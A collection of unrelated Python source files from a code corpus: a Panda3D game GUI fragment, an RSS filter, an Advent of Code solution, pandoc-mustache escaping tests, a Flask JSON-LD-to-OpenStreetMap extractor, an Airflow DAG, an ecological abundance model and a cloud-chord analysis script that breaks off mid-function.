self.btnCancel.setTransparency(0)
self.frmPlayerInfo = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.5, 0.5, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.765, 0, 0),
relief=3,
parent=self.frmMain,
)
self.frmPlayerInfo.setTransparency(0)
self.lblInfoHeader = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblInfoHeader.setTransparency(0)
self.frmImageHero = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-0.15, 0.15, -0.2, 0.2),
hpr=LVecBase3f(0, 0, 0),
image='/home/fireclaw/workspace/Ankandora/AnkandoraLight/design/guiGraphics/heroArcher.png',
pos=LPoint3f(-0.275, 0, 0.195),
image_scale=LVecBase3f(0.15, 1, 0.2),
image_pos=LPoint3f(0, 0, 0),
parent=self.frmPlayerInfo,
)
self.frmImageHero.setTransparency(1)
self.lblClassDescription = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.12, 0, 0.31),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='The archer shoots from afar and gains the first-strike',
text_align=TextNode.A_left,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=10.0,
parent=self.frmPlayerInfo,
)
self.lblClassDescription.setTransparency(0)
self.lblHealth = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.28, 0, -0.1),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Health',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealth.setTransparency(0)
self.lblAttack = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.285),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Attack',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttack.setTransparency(0)
self.lblHealthValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.17),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='7',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealthValue.setTransparency(0)
self.lblAttackValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.36),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='4',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttackValue.setTransparency(0)
def show(self):
self.frmMain.show()
def hide(self):
self.frmMain.hide()
def destroy(self):
self.frmMain.destroy()
| 1.9375 | 2 |
publications/time_mag.py | mkoo21/rss-review-scraper | 0 | 5080 | from . import FROM_FEED_PUBLISHED_TODAY, STRINGIFY
def filter_by_tag(tag, entries):
matches = list(filter(
lambda x: any(list(map(
lambda y: y.term == tag,
x.tags
))),
entries
))
if len(matches) == 0:
return ""
return "<h2>TIME {} - {} results</h2>".format(tag, len(matches)) + \
"".join(list(map(lambda x: STRINGIFY(x, 'TIME'), matches)))
def TIME():
pub_today = FROM_FEED_PUBLISHED_TODAY('https://feeds2.feedburner.com/time/entertainment')
return filter_by_tag('movies', pub_today) + \
filter_by_tag('Television', pub_today)
| 2.78125 | 3 |
2020/21/code.py | irobin591/advent-of-code-2019 | 0 | 5081 | # Advent of Code 2020
# Day 21
# Author: irobin591
import os
import doctest
import re
re_entry = re.compile(r'^([a-z ]+) \(contains ([a-z, ]*)\)$')
with open(os.path.join(os.path.dirname(__file__), "input.txt"), 'r') as input_file:
input_data = input_file.read().strip().split('\n')
def part1(input_data):
"""
>>> part1(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
5
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = contents
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# print(ingredients)
ingredients_with_allergens = set([y for x in allergens.values() for y in x])
# print(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
return len(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
def part2(input_data):
"""
>>> part2(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
'mxmxvkd,sqjhc,fvjkl'
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = list(contents)
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# (allergen, ingredient)
assigned_allergens = []
while sum([len(ingreds) for ingreds in allergens.values()]) > 0:
for allergen in allergens:
if len(allergens[allergen]) == 1:
ingredient = allergens[allergen][0]
assigned_allergens.append((allergen, ingredient))
for allergen2 in allergens:
if ingredient in allergens[allergen2]:
allergens[allergen2].remove(ingredient)
assigned_allergens.sort(key=lambda x: x[0])
return ",".join([x[1] for x in assigned_allergens])
if __name__ == "__main__":
doctest.testmod()
print("Part One: {}".format(part1(input_data)))
print("Part Two: {}".format(part2(input_data)))
pass | 3.515625 | 4 |
tests/test_html_escaping.py | copart/pandoc-mustache | 43 | 5082 | """
Test that escaping characters for HTML is disabled.
"""
import os, subprocess
def test_escape_singlequote(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world ' universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world ' universe\n"
def test_escape_gt(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world > universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world > universe\n"
def test_escape_ampersand(tmpdir):
# Define empty dictionaries
doc = {}
template = {}
# Prepare file names
doc['path'] = tmpdir.join("document.md")
template['path'] = tmpdir.join("template.yaml")
# Prepare file contents
doc['metadata'] = '''---
mustache: {mustachefile}
---
'''
doc['mfiles'] = { "mustachefile": template['path'] }
doc['text'] = 'Hello {{place}}'
template['content'] = "place: world & universe"
# Write contents to files
with open(doc['path'].strpath, "a") as myfile:
myfile.write(doc['metadata'].format(**doc['mfiles']))
myfile.write(doc['text'])
template['path'].write(template['content'])
# Run pandoc
output = subprocess.check_output(["pandoc", doc['path'].strpath, "--filter", "pandoc-mustache", "--to=plain"], universal_newlines=True)
# Test output
assert output == "Hello world & universe\n"
| 2.734375 | 3 |
app.py | iandees/microdata2osm | 1 | 5083 | from flask import Flask, jsonify, request
from w3lib.html import get_base_url
import extruct
import requests
app = Flask(__name__)
def extract_osm_tags(data):
tags = {}
schema_org_type = data.get('@type')
if schema_org_type == 'Restaurant':
tags['amenity'] = 'restaurant'
serves_cuisine = tags.get('servesCuisine')
if serves_cuisine:
cuisine = []
if 'Burgers' in serves_cuisine:
cuisine.append('burger')
if 'Fast Casual' in serves_cuisine:
tags['amenity'] = 'fast_food'
elif schema_org_type == 'Hotel':
tags['tourism'] = 'hotel'
elif schema_org_type == 'ExerciseGym':
tags['leisure'] = 'fitness_centre'
elif schema_org_type == 'BankOrCreditUnion':
tags['amenity'] = 'bank'
else:
return {}
address = data.get('address', {}).get('streetAddress')
if address:
tags['addr:full'] = address
address = data.get('address', {}).get('addressLocality')
if address:
tags['addr:city'] = address
address = data.get('address', {}).get('addressRegion')
if address:
tags['addr:state'] = address
address = data.get('address', {}).get('postalCode')
if address:
tags['postcode'] = address
address = data.get('address', {}).get('addressCountry')
if address:
tags['addr:country'] = address
brand = data.get('brand')
if brand:
tags['brand'] = brand
name = data.get('name')
if name:
tags['name'] = name
telephone = data.get('telephone')
if telephone:
tags['phone'] = telephone
faxNumber = data.get('faxNumber')
if faxNumber:
tags['fax'] = faxNumber
url = data.get('url')
if url:
tags['website'] = url
return tags
@app.route("/extract")
def extract():
url = request.args.get('url')
if not url:
return jsonify(error="Must specify url parameter"), 400
app.logger.info("Extracting json-ld from %s", url)
r = requests.get(url)
if r.status_code != 200:
app.logger.info("HTTP %s from %s", r.status_code, url)
return jsonify(error="Error fetching url"), 502
base_url = get_base_url(r.text, r.url)
data = extruct.extract(r.text, base_url=base_url, syntaxes=["json-ld"])
data = data.get('json-ld')
output = {}
suggested_tags = {}
for entry in data:
suggested_tags.update(extract_osm_tags(entry))
output = {
'status': {
'url': url,
'success': len(suggested_tags) > 0,
},
'suggested_tags': suggested_tags,
}
if request.args.get('include_extracted', type=bool):
output['extracted'] = data
return jsonify(output)
| 2.609375 | 3 |
dags/simple_python_taskflow_api.py | davemasino/airflow101 | 0 | 5084 | """
A simple Python DAG using the Taskflow API.
"""
import logging
import time
from datetime import datetime
from airflow import DAG
from airflow.decorators import task
log = logging.getLogger(__name__)
with DAG(
dag_id='simple_python_taskflow_api',
schedule_interval=None,
start_date=datetime(2021, 1, 1),
catchup=False,
tags=['airflow101'],
) as dag:
@task(task_id="hello_message")
def say_hello():
"""Print a hello message"""
print("Hello, World!")
hello_task = say_hello()
@task(task_id="go_to_sleep")
def sleep_for_1():
"""Go to sleep"""
time.sleep(1)
sleeping_task = sleep_for_1()
hello_task >> sleeping_task
| 3.046875 | 3 |
pyunmarked/roylenichols.py | kenkellner/pyunmarked | 0 | 5085 | from . import model
import numpy as np
from scipy import special, stats
class RoyleNicholsModel(model.UnmarkedModel):
def __init__(self, det_formula, abun_formula, data):
self.response = model.Response(data.y)
abun = model.Submodel("Abundance", "abun", abun_formula, np.exp, data.site_covs)
det = model.Submodel("Detection", "det", det_formula, special.expit, data.obs_covs)
self.submodels = model.SubmodelDict(abun=abun, det=det)
def negloglik(self, x, mod, K):
x = np.array(x)
beta_abun = x[mod["abun"].index]
beta_det = x[mod["det"].index]
y = mod.response.y
N, J = y.shape
lam = mod["abun"].predict(beta=beta_abun, interval=False)
r = mod["det"].predict(beta=beta_det, interval=False).reshape(N, J)
q = 1 - r
nll = 0.0
for i in range(N):
kvals = range(int(mod.response.Kmin[i]), int(K)+1)
f = stats.poisson.pmf(kvals, lam[i])
ymat = np.tile(y[i,], (len(kvals), 1))
qmat = np.tile(q[i,], (len(kvals), 1))
kmat = np.tile(kvals, (J, 1)).transpose()
pmat = 1 - qmat**kmat
g = stats.binom.logpmf(ymat, 1, pmat).sum(axis=1)
fg = f * np.exp(g)
nll -= np.log(fg.sum())
return nll
def simulate(self):
N, J = self.response.y.shape
lam = self.predict("abun", interval=False)
q = 1 - self.predict("det", interval=False).reshape(N, J)
z = np.random.poisson(lam, N)
zrep = np.tile(z, (J,1)).transpose()
p = 1 - q**zrep
y = np.empty((N, J))
for i in range(N):
y[i,] = np.random.binomial(1, p[i,], J)
return y
| 2.296875 | 2 |
proc_chords_xarray.py | pgriewank/ASR_tools | 0 | 5086 | #Contains the functions needed to process both chords and regularized beards
# proc_chords is used for chords
#proc_beard_regularize for generating beards
#proc_pdf saves pdfs of a variable below cloud base
#Both have a large overlap, but I split them in two to keep the one script from getting to confusing.
import numpy as np
import math
from netCDF4 import Dataset
import os
import time as ttiimmee
from scipy.interpolate import interp1d
from scipy.interpolate import interp2d
#from scipy.interpolate import griddata
#from mpl_toolkits.axes_grid1 import make_axes_locatable
import pickle
import sys
#sys.path.insert(0, "/home/pgriewank/code/2019-chords-plumes/")
#from unionfind import UnionFind
from cusize_functions import *
#import matplotlib.pyplot as plt
import pandas as pd
import gc
import glob
import xarray as xr
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Full list of variables to analyze is unclear, I will try to include everything available, but this might break the memory bank
#want to keep the automatic x and y calculation
#Scaling shouldn't be needed, as all chord properties should be indepenent of wind direction (right?)
#Similarly, no basedefinition is needed, all values are relative to cloud base
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#Changing 3D output
#Default is now to always go over x and y directions
#TODO
#plot_flag disabled for the mean time
def proc_chords( date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output='/data/testbed/lasso/chords/',
data_dim_flag=1,
base_percentile = 25,
special_name='',
chord_times = 0,
N_it_min=0,
N_it_max=1e9):
# plot_curtains_flag: 0 nothing, 1 plots pre regularization plots, currently dissabled
# data_dim_flag: 1 = column, 3 = 3D snapshot
# chord_times: 0 use Neils values, use values that fit model output exactly with not gap possible
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
# N_it_min = start number of iterables, 3D timesteps or column files. Only reall makes sense for 3D to avoid some weird initial fields.
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #should be overwritten after the profile data is loaded
dx = 25.0
date = date_str
n_percentiles = 7 #Number of percentiles
percentiles = np.array([5,10,35,50,65,90,95])
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 1200*100 #Made a 100 times longer
cell_min = 3 #Minimal number of cells needed per chord
# #1D clustering parameters,
#set super strict, but goes on for a loooong time as well
if chord_times == 1:
t_gap = 0. #should be pretty strict, no gaps allowed!
t_min = 0.0
t_max = 1e9
cell_min = 3 #Minimal number of cells needed per chord
ql_min = 1e-5 #value used to determine existence of cloud
z_min = 10 #Index of minimum z_vlvl of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
filename_qt = directory_input+date+'/qt.nc'
filename_thl = directory_input+date+'/thl.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
file_thl = Dataset(filename_thl,read='r')
file_qt = Dataset(filename_qt,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
n_chords = 0
#I will try lists first, which I will then convert to arrays in the end before saving in pandas
chord_timesteps = []
chord_length = []
chord_duration = []
chord_time = []
chord_height = [] #percentile of cloud base
chord_w = []
chord_w_up = [] #mean over updrafts
chord_w_base = []
chord_w_star = []
chord_thl_star = []
chord_qt_star = []
chord_thl = []
chord_thl_25 = []
chord_thl_75 = []
chord_qt = []
chord_qt_25 = []
chord_qt_75 = []
chord_w_flux = [] #Sum of w below
#Coming next
chord_w_per = np.zeros([0,n_percentiles])
chord_w_per_up = np.zeros([0,n_percentiles])
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
thl_prof = file_prof['thl'][:,:]
qt_prof = file_prof['qt'][:,:]
nz_prof = w2.shape[1]
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
print('dz: ',dz)
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Mimimum of LCL +100 or variance plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height heigher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
thl_2d = file_col.variables['thl'][:]
thl_2d = thl_2d.transpose()
qt_2d = file_col.variables['qt'][:]
qt_2d = qt_2d.transpose()
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
#lets try saving memory by closing files
#file_col.close()
#The needed cbl height
cbl_1d = t_1d*0
#The needed surface_bouyancy_flux
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d = t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies of thl and qt we subtract the closet mean profile
for tt in range(len(time_prof)):
#globals().update(locals())
tmp_matrix = thl_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = thl_prof[tt,:]
#because the vectors don't perfectly align
thl_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
tmp_matrix = qt_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = qt_prof[tt,:]
#because the vectors don't perfectly align
qt_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
qt_3d = grab_3d_field(file_qt ,it,'qt')
thl_3d = grab_3d_field(file_thl ,it,'thl')
#Here we have to do all the fuckery to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
qt_2d = np.array(qt_3d.reshape((nz,nx*ny)))
thl_2d = np.array(thl_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
qt_3d = np.transpose(qt_3d, (0, 2, 1))
thl_3d = np.transpose(thl_3d, (0, 2, 1))
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
thl_2d = np.hstack([thl_2d ,np.array(thl_3d.reshape((nz,nx*ny)))])
qt_2d = np.hstack([qt_2d ,np.array(qt_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del thl_3d
del qt_3d
#hopefully this helps
gc.collect()
#Getting anomalies of thl and qt
qt_2d[:,:] = (qt_2d.transpose() - qt_prof[it,:]).transpose()
thl_2d[:,:] = (thl_2d.transpose() - thl_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which devided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, str(V_ref)[:4], str(time_resolution)[:4] )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
#dt_1d = t_1d*0
#dt_1d[1:] = t_1d[1:]-t_1d[:-1]
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
thl_2d = np.zeros((nz,1))
qt_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Use to have a different method using nans that doesn:t work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>1e-6)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find c base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
### Clustering 1D
#Now we simply go through all cloudy timesteps and detect chords
#If they fulful chord time requirements and have a number of values which fulfills cell_min they are counted as a chord
#and their properties are calculatted immediately
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
chord_idx_list = []
while t_cloudy_idx < len(cbl_cl_idx)-1:# and n_curtain<100*it: ####################################GO HERE TO SET MAXIMUM CURTAIN
#print(t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
#Originally only cared if they fulfilled cloud criteria, but now I also hard coded that neighboring cells always count
##Check if the index of the next cloudy cell is the same as the next index in total, if so the cells are connected
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#Checking if it fulfils chord criteria regaring time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
ch_duration = 0
if ch_duration>t_min and ch_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_chord_end]))
#list of relevant chord indexes
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
### Now appending chord properties
chord_timesteps.append(t_chord_end-t_chord_begin)
chord_duration.append(ch_duration)
chord_length.append(ch_duration*V_ref)
tmp_base_height = np.percentile(cl_base[ch_idx_l],base_percentile)*dz
chord_height.append(tmp_base_height) #25th percentile of cloud base
surf_b_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
w_star = (tmp_base_height*surf_b_flux)**(1./3.)
surf_qt_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
qt_star = surf_qt_flux/w_star
surf_thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
thl_star = surf_thl_flux/w_star
chord_w_star.append(w_star )
chord_thl_star.append(thl_star )
chord_qt_star.append(qt_star )
chord_w_base.append(np.mean(w_2d[cl_base[ch_idx_l],ch_idx_l]))
chord_w.append(np.mean(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_thl.append(np.mean(thl_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
#get a fourth and 3/4 of the cloud base
cl_base_25_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)/4.)
cl_base_75_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)*3./4.)
#print ('cl base idx:',np.percentile(cl_base[ch_idx_l],base_percentile),'clbase/4:',cl_base_25_idx[0],'clbase3/4:',cl_base_75_idx[0])
chord_thl_25.append(np.mean(thl_2d[cl_base_25_idx,ch_idx_l]))
chord_thl_75.append(np.mean(thl_2d[cl_base_75_idx,ch_idx_l]))
chord_qt.append(np.mean(qt_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_qt_75.append(np.mean(qt_2d[cl_base_75_idx,ch_idx_l]))
chord_qt_25.append(np.mean(qt_2d[cl_base_25_idx,ch_idx_l]))
chord_w_flux.append(np.sum(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
w_base_vec = w_2d[cl_base[ch_idx_l]-1,ch_idx_l]
chord_w_up.append(np.mean(w_base_vec[w_base_vec>0.0]))
tmp_w_per = np.percentile(w_base_vec,percentiles)
if len(w_base_vec[w_base_vec>0.0])>0:
tmp_w_per_up = np.percentile(w_base_vec[w_base_vec>0.0],percentiles)
else:
tmp_w_per_up = np.zeros(n_percentiles)
tmp_w_per_up[:] = 'nan'
chord_w_per = np.vstack([chord_w_per,tmp_w_per])
